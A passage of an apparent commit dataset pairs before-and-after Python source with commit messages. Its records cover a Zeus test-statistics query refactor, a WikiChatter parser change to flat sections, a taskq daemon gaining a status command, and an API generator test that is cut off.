from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
Simplify query plan for repo tests
|
ref: Simplify query plan for repo tests
|
Python
|
apache-2.0
|
getsentry/zeus,getsentry/zeus,getsentry/zeus,getsentry/zeus
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
ref: Simplify query plan for repo tests
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
<commit_before>from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
<commit_msg>ref: Simplify query plan for repo tests<commit_after>
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
ref: Simplify query plan for repo tests
from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
<commit_before>from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.join(Job, TestCase.job_id == Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
TestCase.repository_id == repo.id,
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
<commit_msg>ref: Simplify query plan for repo tests<commit_after>from datetime import timedelta
from sqlalchemy.sql import func
from zeus.config import db
from zeus.constants import Result, Status
from zeus.models import Repository, TestCase, Job
from zeus.utils import timezone
from .base_repository import BaseRepositoryResource
from ..schemas import TestCaseStatisticsSchema
testcases_schema = TestCaseStatisticsSchema(many=True)
class RepositoryTestsResource(BaseRepositoryResource):
def get(self, repo: Repository):
"""
Return a list of testcases for the given repository.
"""
runs_failed = (
func.count(TestCase.result)
.filter(TestCase.result == Result.failed)
.label("runs_failed")
)
query = (
db.session.query(
TestCase.hash,
TestCase.name,
func.count(TestCase.hash).label("runs_total"),
runs_failed,
func.avg(TestCase.duration).label("avg_duration"),
)
.filter(
TestCase.job_id.in_(
db.session.query(Job.id)
.filter(
Job.repository_id == repo.id,
Job.date_finished >= timezone.now() - timedelta(days=14),
Job.status == Status.finished,
)
.subquery()
)
)
.group_by(TestCase.hash, TestCase.name)
.order_by(runs_failed.desc())
)
return self.paginate_with_schema(testcases_schema, query)
|
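The rewrite trades an explicit join for an IN-filter over a subquery of job ids, so the planner can resolve the repository/date/status filter once before aggregating test cases. The same transformation in isolation, using the 1.x Query API this record uses (session, Parent, Child and cutoff are placeholders, not from this record):

from sqlalchemy.sql import func

recent_parent_ids = (
    session.query(Parent.id)
    .filter(Parent.created >= cutoff)
    .subquery()
)
rows = (
    session.query(Child.name, func.count(Child.id))
    .filter(Child.parent_id.in_(recent_parent_ids))  # was: .join(Parent, ...)
    .group_by(Child.name)
    .all()
)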
08c2e38f9c87926476e7ad346001bf2a8271ab47
|
wikichatter/TalkPageParser.py
|
wikichatter/TalkPageParser.py
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
Switch to flat sections to avoid double including subsections
|
Switch to flat sections to avoid double including subsections
|
Python
|
mit
|
kjschiroo/WikiChatter
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
Switch to flat sections to avoid double including subsections
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
<commit_before>import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
<commit_msg>Switch to flat sections to avoid double including subsections<commit_after>
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
Switch to flat sections to avoid double including subsections
import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
<commit_before>import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
# skip_style_tags is fix for https://github.com/kjschiroo/WikiChatter/issues/10
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections()
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
<commit_msg>Switch to flat sections to avoid double including subsections<commit_after>import mwparserfromhell as mwp
from . import IndentTree
from . import WikiComments as wc
class Page:
def __init__(self):
self.indent = -2
def __str__(self):
return "Talk_Page"
class Section:
def __init__(self, heading):
self.heading = heading
self.indent = -1
def __str__(self):
return self.heading
def parse(text):
root = IndentTree.IndentTreeNode(None, Page())
parse_list = []
wikicode = mwp.parse(text, skip_style_tags=True)
sections = wikicode.get_sections(flat=True)
for section in sections:
section_text = str(section)
comments = wc.get_linear_merge_comments(section_text)
if len(comments) > 0:
headings = mwp.parse(section_text).filter_headings()
if len(headings) > 0:
heading = "\n" + "\n".join([str(h) for h in headings])
else:
heading = "NO HEADING FOUND"
parse_list.append(Section(heading))
parse_list.extend(comments)
root.generate_tree_from_list(parse_list)
return root
|
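In mwparserfromhell, each section returned by get_sections() contains all of its subsections, so text under a level-3 heading also appears inside its level-2 parent and would be handled twice by a loop like the one above; flat=True returns non-overlapping sections instead. A small demonstration (the wikitext is made up):

import mwparserfromhell as mwp

text = "== Topic ==\nparent comment\n=== Thread ===\nchild comment\n"
wikicode = mwp.parse(text)

nested = [str(s) for s in wikicode.get_sections() if "== Topic ==" in str(s)]
flat = [str(s) for s in wikicode.get_sections(flat=True) if "== Topic ==" in str(s)]

print("child comment" in nested[0])  # True: the parent still carries its subsection
print("child comment" in flat[0])    # False: flat sections do not nest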
f35c6f989129d6298eb2f419ccb6fe8d4c734fd6
|
taskq/run.py
|
taskq/run.py
|
import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
Add status to the daemon
|
Add status to the daemon
|
Python
|
mit
|
LeResKP/sqla-taskq
|
import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
Add status to the daemon
|
import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
<commit_before>import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
<commit_msg>Add status to the daemon<commit_after>
|
import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
Add status to the daemon
import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
<commit_before>import time
import transaction
from taskq import models
from daemon import runner
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = runner.DaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
<commit_msg>Add status to the daemon<commit_after>import time
import transaction
from daemon import runner
from taskq import models
class TaskDaemonRunner(runner.DaemonRunner):
def _status(self):
pid = self.pidfile.read_pid()
message = []
if pid:
message += ['Daemon started with pid %s' % pid]
else:
message += ['Daemon not running']
tasks = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).all()
message += ['Number of waiting tasks: %s' % len(tasks)]
runner.emit_message('\n'.join(message))
action_funcs = {
u'start': runner.DaemonRunner._start,
u'stop': runner.DaemonRunner._stop,
u'restart': runner.DaemonRunner._restart,
u'status': _status,
}
class TaskRunner():
def __init__(self):
self.stdin_path = '/dev/null'
self.stdout_path = '/dev/tty'
self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/task-runner.pid'
self.pidfile_timeout = 5
def run(self):
while True:
task = models.Task.query.filter_by(
status=models.TASK_STATUS_WAITING).first()
if not task:
time.sleep(2)
continue
with transaction.manager:
task.status = models.TASK_STATUS_IN_PROGRESS
task.perform()
task.status = models.TASK_STATUS_FINISHED
models.DBSession.add(task)
time.sleep(2)
def main():
app = TaskRunner()
daemon_runner = TaskDaemonRunner(app)
daemon_runner.do_action()
if __name__ == '__main__':
main()
|
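DaemonRunner dispatches argv[1] through its class-level action_funcs mapping, which is why overriding that dict is all it takes to add a verb; invoking the script with `status` then works like the built-in start/stop/restart actions. The same extension pattern in isolation (the `ping` action is invented for illustration):

from daemon import runner

class PingableRunner(runner.DaemonRunner):
    def _ping(self):
        # Custom actions can inspect the pidfile just like _status above.
        runner.emit_message('pong (pid: %s)' % self.pidfile.read_pid())

    action_funcs = dict(runner.DaemonRunner.action_funcs, ping=_ping)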
91d6503ebf3188a6e27058efcb10c0855df3542a
|
falafel/tests/test_api_generator.py
|
falafel/tests/test_api_generator.py
|
import unittest
from tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
self.assertIn(each, self.latest)
self.assertGreater(len(self.latest[each]), 0)
def test_meta_specs(self):
# these sections must exist in the meta_specs, have an 'archive_file_name' field,
# and it must not be empty
for each in ['analysis_target', 'branch_info', 'machine-id', 'uploader_log']:
self.assertIn(each, self.latest['meta_specs'])
self.assertIn('archive_file_name', self.latest['meta_specs'][each])
self.assertGreater(len(self.latest['meta_specs'][each]['archive_file_name']), 0)
def test_specs(self):
# check that each spec only has target sections for known targets
for eachspec in self.latest['specs']:
for eachtarget in self.latest['specs'][eachspec]:
self.assertIn(eachtarget, ['host', 'docker_container', 'docker_image'])
|
import unittest
from falafel.tools import generate_api_config
class TestAPIGen(unittest.TestCase):
@classmethod
def setUpClass(cls):
from falafel.mappers import * # noqa
pass
def setUp(self):
self.latest = generate_api_config.APIConfigGenerator(plugin_package="falafel").serialize_data_spec()
def tearDown(self):
self.latest = None
def test_top_level(self):
# these sections must exist and not be empty
for each in ['version', 'files', 'commands', 'specs', 'pre_commands', 'meta_specs']:
